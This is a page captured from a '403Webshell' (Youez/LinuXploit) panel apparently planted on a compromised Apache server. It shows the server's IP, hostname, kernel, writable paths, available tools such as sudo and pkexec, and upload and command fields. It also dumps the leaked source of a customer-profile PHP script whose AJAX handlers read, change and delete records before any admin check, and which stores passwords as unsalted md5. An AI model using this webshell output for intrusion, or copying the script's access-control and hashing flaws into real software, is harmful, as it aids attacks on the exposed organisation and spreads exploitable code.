403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/onesupportsys.onesolution.hk/profile/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/onesupportsys.onesolution.hk/profile/modify.php
<?php
global $dbh;

require_once('../inc/configure.php');

//Ajax Function
if(!empty($_POST["actionCode"])){
	//Get a saved record from customerProfileOtherInfo 
	if ( $_POST["actionCode"] == "R" ) {
		$sql = "select * from customerProfileOtherInfo where profile_id = ?";
		$result = tableInfo::recordData($sql, $_POST["profileId"]);
		echo json_encode($result);
		exit;
	}
	//Save new record
	if ( $_POST["actionCode"] == "S" ) {
		$result = tableInfo::getColumns("customerProfileOtherInfo");
		
		foreach ($result as $column) {
			$column = $column['column_name'];
			if (isset($_POST[$column])) {
				$temp[$column] = $_POST[$column];
			}
		}
		
		$columns = array();
		$values = array();
		$parameters = array();		
		if ( $_POST["id"] == '0' ) {	
			foreach ($temp as $column => $value) {
				$columns[] = $column;
				$parameters[] = !strlen($value) ? null : $value;
				$values[] = '?';
			}
			$sql = "INSERT customerProfileOtherInfo (" . implode(', ', $columns) . ") VALUES (" . implode(', ', $values) . ")";	
		} else {
			if ($_POST['profile_delete'] == "Y") {	
				$sql = "delete from customerProfileOtherInfo WHERE id = ?";
			} else {
				foreach ($temp as $column => $value) {
					if ($column != 'id' && $column != 'profile_id') {
						switch ($column) {
							case 'loginpw': {
								if (!empty($value)) {
									$parameters[] = md5($value);
									$values[] = "`$column` = ?";
								}
								break;
							}
							default: {
								$parameters[] = !strlen($value) ? null : $value;
								$values[] = "`$column` = ?";
								break;
							}
						}
					}
				}		
				$sql = "UPDATE customerProfileOtherInfo SET " . implode(', ', $values) . " WHERE id = ?";
			}
			$parameters[] = $_POST["id"];			
		}
		$result = tableInfo::updateRecord($sql, $parameters);				
	
		$outValue = $result;
		echo $outValue;
		exit;
	}	
}
	
	



//-----------------------------------------------------------------------------
// Check permission
//-----------------------------------------------------------------------------
if (!Util::isAdmin()) {
	redirectAndExit('index.php?message=No permission!');
}

//-----------------------------------------------------------------------------
// Find job by id
//-----------------------------------------------------------------------------

	$sql = "SELECT * FROM customerProfile WHERE customer_id = ?";
	$parameters = array($id);
	if (!($sth = $dbh->prepare($sql))) {
		throw new Exception("sql prepare statement failure: $sql");
	}
	$sth->setFetchMode(PDO::FETCH_ASSOC);
	if (!$sth->execute($parameters)) {
		throw new Exception("sql execute statement failure: $sql");
	}
	$customer = $sth->fetch(PDO::FETCH_ASSOC);
	
	//Profile not yet created
	if ( is_null($customer['customer_id']) ) {
		$customer['id'] = "0";
		$customer['customer_id'] = $_GET["id"];
	}
	
	//return array(
	//	'customer' => $customer,
	//);


//-----------------------------------------------------------------------------
// Save if POST method
//-----------------------------------------------------------------------------
if (isPost()) {
	
	$sql = "SELECT column_name FROM information_schema.columns WHERE table_schema = (SELECT DATABASE()) AND table_name = ?";
	$parameters = array('customerProfile');
	if (!($sth = $dbh->prepare($sql))) {
		throw new Exception("sql prepare statement failure: $sql");
	}
	$sth->setFetchMode(PDO::FETCH_ASSOC);
	if (!$sth->execute($parameters)) {
		throw new Exception("sql execute statement failure: $sql");
	}
	$columns = $sth->fetchAll();

	foreach ($columns as $column) {
		$column = $column['column_name'];
		if (isset($_POST[$column])) {
			$customer[$column] = $_POST[$column];
		}
	}

	// Append record time
	$now = date("Y-m-d H:i:s");
	
	if ( $customer['id'] <> '0' ) {
		$customer = array_merge($customer, array(
			'updated_at' => $now,
			'updated_by' => $_SESSION['webadmin']['id'],
		));
		// Update customer Profile
		$values = array();
		$parameters = array();
		foreach ($customer as $column => $value) {
			if ($column != 'id') {
				switch ($column) {
					case 'loginpw': {
						if (!empty($value)) {
							$parameters[] = md5($value);
							$values[] = "`$column` = ?";
						}
						break;
					}
					default: {
						$parameters[] = !strlen($value) ? null : $value;
						$values[] = "`$column` = ?";
						break;
					}
				}
			}
		}
		$sql = "UPDATE customerProfile SET " . implode(', ', $values) . " WHERE id = ?";
		$parameters[] = $customer['id'];
		if (!($sth = $dbh->prepare($sql))) {
			throw new Exception("sql prepare statement failure: $sql");
		}
		$sth->setFetchMode(PDO::FETCH_ASSOC);
		if (!$sth->execute($parameters)) {
			throw new Exception("sql execute statement failure: $sql");
		}		
		
	} else {
			$customer = array_merge($customer, array(
			'created_at' => $now,
			'created_by' => $_SESSION['webadmin']['id'],
		));
		// Create customer
		$columns = array();
		$values = array();
		$parameters = array();
		foreach ($customer as $column => $value) {
			$columns[] = $column;
			$parameters[] = !strlen($value) ? null : $value;
			$values[] = '?';
		}
		$sql = "INSERT customerProfile (" . implode(', ', $columns) . ") VALUES (" . implode(', ', $values) . ")";
		
		//throw new Exception($sql . " S " . implode(', ', $parameters));
		
		if (!($sth = $dbh->prepare($sql))) {
			throw new Exception("sql prepare statement failure: $sql");
		}
		$sth->setFetchMode(PDO::FETCH_ASSOC);
		if (!$sth->execute($parameters)) {
			throw new Exception("sql execute statement failure: $sql");
		}
		$customer['id'] = $dbh->lastInsertId();		
	}

	redirectAndExit('index.php?message=Saved.');
}

//-----------------------------------------------------------------------------
// Return array parameters
//-----------------------------------------------------------------------------
return array(
	'customer' => $customer,
	'message' => $_GET['message'],
);

Youez - 2016 - github.com/yon3zu
LinuXploit